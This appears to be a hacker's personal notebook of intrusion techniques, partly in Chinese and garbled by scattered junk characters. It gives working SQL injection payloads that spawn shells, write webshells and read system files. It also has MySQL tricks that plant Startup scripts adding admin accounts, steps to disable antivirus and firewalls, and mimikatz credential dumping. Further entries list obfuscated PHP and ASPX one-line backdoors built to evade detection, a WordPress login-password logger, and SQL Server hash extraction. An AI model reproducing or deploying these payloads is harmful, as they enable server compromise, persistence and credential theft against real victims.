4 H* ?1 S0 G0 i# SC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml" n9 Z. D% o, S) {: {
+ {: w6 a9 K! a7 K8 `1 Y
如果都找不到 那就看看class文件吧。。) l+ { |+ S# L. N6 u1 M
4 N8 Z, U$ e% L5 j* h: A, Y4 p
测试1: 1 b# v0 q3 I+ j. z L* U- LSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1 $ A6 M1 A0 t/ \! m) D8 }* C. M8 B. E. C3 P7 N3 ~% }
测试2:1 H* J: w8 e; [0 D% q7 z
' D+ {9 z; ^) Z3 }- _; Screate table dirs(paths varchar(100),paths1 varchar(100), id int)# F! R( s* K* p6 _8 |( J
: L l* @* R* ~' E9 D w: Z8 _, Y
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--) |( a' W- E4 [
% Z2 p' N' z3 k9 e' fSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1 9 p3 X, w* J% Z9 {- Z* `. O8 t. v d( Y6 J
查看虚拟机中的共享文件: ( a/ h5 L0 T$ b6 G4 S9 h4 J4 U在虚拟机中的cmd中执行 , }$ r3 B% a+ p) q$ k3 U- q\\.host\Shared Folders & m8 t4 e) s0 A5 Y/ O. @ - A3 [/ o$ }$ W2 B# l8 Ycmdshell下找终端的技巧 % ]2 K5 j" [) t7 X5 Y找终端: 1 P* w: p+ y) G. I3 O第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! ! V3 V1 ]- ^( q; { 而终端所对应的服务名为:TermService 7 G7 o% N- i8 a; d$ r1 P
第二步:用netstat -ano命令,列出所有端口对应的PID值! 6 V: @ m% N4 }' J" X$ L' e7 t 找到PID值所对应的端口* w! L8 u1 m/ V) C
- u& A1 ]. H$ r( J, w" m查询sql server 2005中的密码hash. j7 W' h! A" \* }$ J& g( i. D
SELECT password_hash FROM sys.sql_logins where name='sa'" Q' N" w+ x) S# c
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a / A0 s8 K7 G- U: {0 jaccess中导出shell u) N( P- }* h , z9 J, a! Z. }: K% Y中文版本操作系统中针对mysql添加用户完整代码:# h1 ^' v0 o9 @
0 R$ a3 d8 N* ?use test; _* h: A( _- G$ ^) x7 x: N& {$ b( rcreate table a (cmd text); & g6 `" `* i) r' Xinsert into a values ("set wshshell=createobject (""wscript.shell"") " ); z7 q( e( H* ^' H G5 s3 `insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " ); 8 Q% y, T/ F- b. `insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );6 {" }4 N2 q" h3 r- F
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";5 Q j# _ Y: `: U6 b& e
drop table a; $ T4 Y q1 s: t+ _! ~! `- J% K 6 z/ f( v; v5 p7 F4 b7 b7 b ^英文版本:) h: G" y; F( `2 _" \/ T
0 g4 P& e u( k7 n
use test;) `: b9 i& }1 u% C+ r1 H
create table a (cmd text); 3 j* K) o! r" d, A; n) {: ?6 }insert into a values ("set wshshell=createobject (""wscript.shell"") " ); & ^' C* ?/ f& P& Iinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );1 x0 y* O2 @# Y/ P V/ h) C$ e
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );0 I* ]# a$ p) K4 M" S- O; r
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";2 p/ Q+ i* i4 ?4 Q9 \5 @; p, r
drop table a;* V9 K# Q( k" P4 d" C
4 t" F6 m. P* U' ~" dcreate table a (cmd BLOB);+ Z; t9 e6 p' M* f
insert into a values (CONVERT(木马的16进制代码,CHAR));' S7 G: f8 |" t, A4 Y$ U
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'6 e) V! j. G8 }9 A
drop table a;9 f* Y. n' @& f9 [& C( i- \
" I. ?& H: k- K/ G6 f) N, m6 ?
记录一下怎么处理变态诺顿. \/ [, z) [: C0 }3 A# x3 u
查看诺顿服务的路径 . S/ \! @9 e# n. C6 k! Tsc qc ccSetMgr * J- d8 r' q O* a* |然后设置权限拒绝访问。做绝一点。。 0 C3 A6 {, U4 q1 Vcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system 1 r5 ~; m8 U" W( d3 E, J& [* mcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER" - v$ l8 k5 x! [/ C: @" gcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators& `# k- r0 _" n' a/ O: F. T0 Y
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone 8 p: R5 E2 G* b7 g! s: j' x9 p8 t: R; k
然后再重启服务器 : q2 p$ i, j: @$ Qiisreset /reboot 0 U& f e, l! v$ @6 }这样就搞定了。。不过完事后。记得恢复权限。。。。. b% ~+ \- t' V. E4 m1 A
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F - @) \( t5 o, j* \$ N! g7 S; N# Scacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F/ ]3 d" C5 r; e1 t* e' k
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F ( M. R+ f( C8 V6 A% Kcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F- w# [! {# ^2 X* Q5 L9 ^/ L
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin1 o! M7 B0 v! c6 P
; W6 B, Z3 ]# _, J& X7 d; e' e
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''') y. b$ G/ v2 S! h( x; q/ v% {3 s h7 a7 r9 Y/ x0 M- ^9 b& t4 I
postgresql注射的一些东西 + V1 Y4 N+ t2 V1 F; `( E如何获得webshell5 e( v( b8 w1 a. H8 q' x$ r http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); - A/ k. j7 Q t+ H, I$ U http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); : O7 y& l* B* L, F http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;8 Q8 ^' @6 P) c7 u. x0 N
如何读文件 : I" K/ I6 Q+ [2 J( p6 v# u# Z- z! T7 {) ]http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT); 7 r/ s3 D3 u- Y- _http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’; - F! Y- |- F. S( c ^http://127.0.0.1/postgresql.php?id=1;select * from myfile;' S% [4 F) t5 H, }" N
& R! g: p& a0 mz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。! k a+ L( D; t
当然,这些的postgresql的数据库版本必须大于8.X( q' L) S+ p+ M2 H
创建一个system的函数:8 T: E- Q2 J3 u- l2 i
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT) U$ `7 k5 U) o- v2 ?4 I0 }
; e9 ]/ w) @! V4 P. J$ D, pcopy 输出的内容到表里面; , K: D* m0 k7 N1 ?COPY stdout(system_out) FROM '/tmp/test'# E3 ~4 s: s3 R, Y* P
- L' G% I. [. F7 g从输出表内读取执行后的回显,判断是否执行成功' c+ `5 Y# @* h3 M
+ p# Q! U9 t6 L3 W& J3 Y
SELECT system_out FROM stdout 8 n/ p. _% [ P- e% L- ^5 \下面是测试例子 : X8 d- V3 m, q. _ 0 ~# H$ j5 q. u ^+ u) w/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- 4 R: B. }& w2 k; H( Z0 X3 I4 \( |5 R- `5 ~
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'' |' f- I! }: J# ?- N# T
STRICT --: ^ U# b& D+ g8 y3 D. s
: X- @1 w, X! d/store.php?id=1; SELECT system('uname -a > /tmp/test') -- # D' [; J3 ~! R) a! |% ~ # w& C9 v, j5 l j/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --& w }9 ~% V5 {: o7 b
. s# u& D5 B. e
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1-- ; u$ d: s6 I8 A3 Lnet stop sharedaccess stop the default firewall; I2 \4 `' U2 R0 a% W( s
netsh firewall show show/config default firewall , K# D' D3 j$ ?5 [4 y% K+ unetsh firewall set notifications disable disable the notify when the program is disabled by the default firewall * N3 v _ a- E4 T( anetsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall f' V8 }" j- o p* t3 a修改3389端口方法(修改后不易被扫出) & L: o2 A6 e- h% S) ~" I; [修改服务器端的端口设置,注册表有2个地方需要修改. O" O: B. }: D8 \0 T( E9 M
# C- s) Y8 J/ J7 |$ y9 n
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
PortNumber值,默认是3389,修改成所希望的端口,比如6000
第二个地方:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
PortNumber值,默认是3389,修改成所希望的端口,比如6000
两处都改好后,重启系统即可。注意:改端口只能避开针对默认3389端口的扫描,防火墙的放行规则也要同步改到新端口。
查看3389远程登录的脚本 0 \2 l- w6 t( c) F8 M; G保存为一个bat文件 9 {& b8 O9 j" S0 x3 \date /t >>D:\sec\TSlog\ts.log 2 Z. w& V0 _% M7 a* A: v# D, w; ztime /t >>D:\sec\TSlog\ts.log4 b- c# C" q ^+ z- M
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log# ~) `( u' y; h3 }0 l
start Explorer/ L% U! q6 ]/ ^. j* { k8 C7 R
8 _) C. H! o- o9 T tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)' v P+ w: x5 A0 z/ ^& S8 R
% c& [0 b5 I5 z2 I SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找): e5 d% M3 W b. U& @7 `0 O P
set names gb2312) r1 t. v. M% J( a- I
导入数据库时显示“Data too long for column 'username' at row 1”错误,原因是当前字符集不支持中文。
4 I# C9 Y: C3 f Dmysql 密码修改 / v" [& ], B6 ^' {5 z1 J4 B8 P0 `1 pUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” & e- ^& u" ^* O; {- `* U
update user set password=PASSWORD('antian365.com') where user='root';4 Z' f1 }: ?$ b. e5 H! H& M7 N
flush privileges; 3 `- B4 k; H% t" F3 p* V高级的PHP一句话木马后门) g4 W9 G0 x: o. F' \
$ a9 {8 F5 k+ E3 q+ [
入侵过程中发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀。
- H3 e' G( M' p+ o, R1、/ O! m5 L' j5 ~4 A- t4 o
6 s/ b; S9 m' Z0 Z. J+ N
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";$ ? ~& i1 Z) X$ Y
; G, P$ I* f2 ~' `" D
$hh("/[discuz]/e",$_POST['h'],"Access"); + l6 k8 R$ h/ G$ c2 I$ j' c9 R$ _ 4 a' R$ Q1 d$ d) v3 ~5 u) W; V/ l//菜刀一句话 - t: }8 g" |% u" g$ z8 v' P ; m) N2 C/ h( m9 q) q4 i2、 , U/ K5 k. C5 w0 {$ T+ K, }) @! r ' j) A9 Q, l1 d+ _; t V3 g6 X$filename=$_GET['xbid']; : M1 w2 k: y! `7 J: N6 x3 k 3 z" |7 F* o* e# [9 Tinclude ($filename);7 `; J# p' B1 A6 F: o% w7 @
) Y: ^1 _& v/ I: X1 D8 \
//危险的include函数,会把任何文件当作PHP代码解析运行
* R. s2 x D& B+ o! ]3、# l( R+ n2 _# ?- M
7 z' c2 o5 Q! \" m' P
$reg="c"."o"."p"."y";+ F+ q: t, b' R2 ?$ l
* J, {- ]& _( I1 X4 G6 y; G, O, f
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);# m8 N+ t% P4 h$ K5 [; R* i+ N
& R. M4 c4 V+ N//重命名任何文件 # X) r" G( e% ~7 o& o- @! ~0 U7 {- q& ? j0 y+ R
4、1 G F3 d' v W4 u
4 f3 Z! B4 R+ r, h. q9 t' U$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e"; 7 p8 T: c2 B0 u/ Z, L0 z# I F( ]/ ^' |3 Y& v" m$ {0 s# Z5 O
$gzid("/[discuz]/e",$_POST['h'],"Access");0 W& n9 A7 _! f
. L7 y% H+ B% r* z4 `) t/ S! G
//菜刀一句话 2 g1 j1 q8 f t. \; q/ n1 [8 y, Q' Z7 d; U* x
5、include ($uid);# I8 P- w9 Q: Y+ t
, e7 l6 V" M' C8 d& e% ~" `; E
//危险的include函数,会把任何文件当作PHP代码解析运行,POST
/ e& m9 |* a7 {5 u U' S V 9 E. k+ y' J o: s$ X//gif插一句话 # t4 O, \3 w+ a0 D0 A7 m ; D7 N1 L" q; g& V- H8 ^- l6、典型一句话6 P: q6 f" f; Q' m! K
$ F/ K" h( u/ V- y' b6 D
程序后门代码 : B! ?# h; T6 j" }$ n<?php eval_r($_POST[sb])?> 8 [/ B# Z) A( a+ C2 E程序代码3 M+ _) ^7 S7 ~) k; t
<?php @eval_r($_POST[sb])?> w! }; U H) {' e, P ]//容错代码6 S6 K3 V$ C7 N1 q
程序代码 * E9 Y+ e, x, p/ N) d<?php assert($_POST[sb]);?> D% t9 j4 {. d+ Q//使用lanker一句话客户端的专家模式执行相关的php语句# H6 ]) a, F& M" B( e
程序代码! Q. p- ^0 U! k0 |3 F7 z- M# s3 [
<?$_POST['sa']($_POST['sb']);?>$ j8 g+ c. F$ D6 n
程序代码+ H8 ?" t5 |: d6 O4 c
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?> ! }+ c1 d7 r0 d. e- @程序代码9 B$ z/ | p$ o
<?php + r# |" n# C( p1 F+ p( V" v: \@preg_replace("/[email]/e",$_POST['h'],"error"); " u" _% @( Q. S2 w* _?>. `0 y3 U# k! C6 T3 K
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入2 M/ S9 n" F' M5 c. a) _# \
程序代码5 f8 E T! N9 B9 c9 _7 U0 e
<O>h=@eval_r($_POST[c]);</O>2 X, y$ e% `$ W0 r) C. \2 d; }
程序代码, n3 z# Z& P& } ^
<script language="php">@eval_r($_POST[sb])</script> 0 l# [/ z0 `, S# K: j//绕过<?限制的一句话 % p8 J# @; |4 h' Q4 v* d* h+ C# `5 E {8 y K) }, f http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip$ e" N. a5 V: y: c5 z
详细用法:! p* p7 @: f K" f$ j
1、到tools目录。psexec \\127.0.0.1 cmd 5 U9 S* ~) X& P1 _3 y. ^8 N- M! T2、执行mimikatz3 e; g: t/ X1 s( t3 |, f
3、执行 privilege::debug 5 S7 s; U2 m% G. Z4、执行 inject::process lsass.exe sekurlsa.dll / H9 t! H# b) `: S5 g- K @0 s$ z6 [2 C0 e5、执行@getLogonPasswords , Z! t" g2 ~, q2 Q6、widget就是密码 / D& P* o# S0 A( C3 j n1 m7、exit退出,不要直接关闭否则系统会崩溃。 + }4 x. V: B& ^+ q4 E9 K0 M) J% b- k' O! g$ } http://www.monyer.com/demo/monyerjs/ js解码网站比较全面 : s( d" ? Q% b- e" [" L+ T ! L: t0 g( l+ l4 o# w自动查找系统高危补丁" i* w3 O" K% e- G: ]
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt& w# Y+ d; T# A4 T
5 ]* C: b9 \8 k; F3 ?
突破安全狗的一句话aspx后门7 d& S4 b0 E1 @( F! H" [7 F
<%@ Page Language="C#" ValidateRequest="false" %>2 ^' I4 I* w' D
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%> 2 H# K1 h2 d, e% H2 uwebshell下记录WordPress登陆密码 7 J' Y- ~) m" r4 cwebshell下记录Wordpress登陆密码方便进一步社工0 w, D# S4 k4 E: n) V9 q! I
在文件wp-login.php中539行处添加: 0 C" a6 \- K; }// log password Q' I, d/ M5 W$log_user=$_POST['log']; & [$ {, C, F- i& g3 i0 A$log_pwd=$_POST['pwd']; - ^, g; n2 S: G! e3 m5 |$log_ip=$_SERVER["REMOTE_ADDR"];: B* H7 Z, J1 A/ U5 h) a$ R
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip; ; }- ~( E* i' g! @# g$txt=$txt.”\r\n”; - p( y& O5 v" N! Xif($log_user&&$log_pwd&&$log_ip){ # [5 y5 n6 _& V- N- R3 [@fwrite(fopen(‘pwd.txt’,”a+”),$txt);: ]3 L- I% n5 k9 J4 @. {
}! A5 [# U# {: p6 Y5 g
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。 1 C+ o5 T7 Q6 Y7 a# T. d; u. {就是搜索case ‘login’4 c' \! b+ ]2 p( {1 o1 o1 s
在它下面直接插入即可,记录的密码生成在pwd.txt中,8 V6 Y; S+ k' q0 R
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录 - l2 E/ G1 m `% S利用II6文件解析漏洞绕过安全狗代码:- s g- {1 a4 x# K" ^& Z1 L
;antian365.asp;antian365.jpg ( ~6 P9 l, R2 k. B4 _( I! W( x3 ~) r- P: S8 S3 r% l1 Y
各种类型数据库抓HASH破解最高权限密码!# R: k h* @+ f! \, {- a$ ?) Y
1.sql server2000% j% e- a' G9 P' E7 a q. \
SELECT password from master.dbo.sysxlogins where name='sa' . l6 ?7 T- o+ h; y: C2 ^! j* j0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341, w0 z3 Q& O; |- y' T
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A . u% z9 N' g3 [/ P3 T& p% k J) X4 y3 k9 M9 @9 ^. |5 C; e
0x0100 - constant header
34767D5C - salt
0CFA5FDCA28C4A56085E65E882E71CB0ED250341 - case sensitive hash
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A - upper case hash
crack the upper case hash in 'cain and abel' and then work the case sensitive hash
SQL server 2005:- 7 r3 A& J/ i1 ]" h ESELECT password_hash FROM sys.sql_logins where name='sa' 8 r" I, H% R4 j) ? z0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F T0 N, q2 S$ c u0×0100- constant header$ t0 x+ E _! ]5 S# f! w/ ^
993BF231-salt 5 ?1 P- L1 S" k8 {# z" ~% S' K* R5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash $ f" q; {3 e' I: L" j! S% tcrack case sensitive hash in cain, try brute force and dictionary based attacks.' }' k. b2 V3 w( k2 W, i1 V
4 a+ }7 _9 S2 s5 q; ], e
update:- following bernardo's comments:-
Use the function fn_varbintohexstr() to convert the password to a hex string.
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins F2 h4 v8 }1 `! H; C
* V/ d" Z: L1 @MYSQL:-1 s: {2 ~* u1 V# H5 L! \
/ R7 F" k2 Q0 O+ ?/ w
In MySQL you can generate hashes internally using the password(), md5(), or sha1() functions. password() is the function used for MySQL's own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
*mysql < 4.1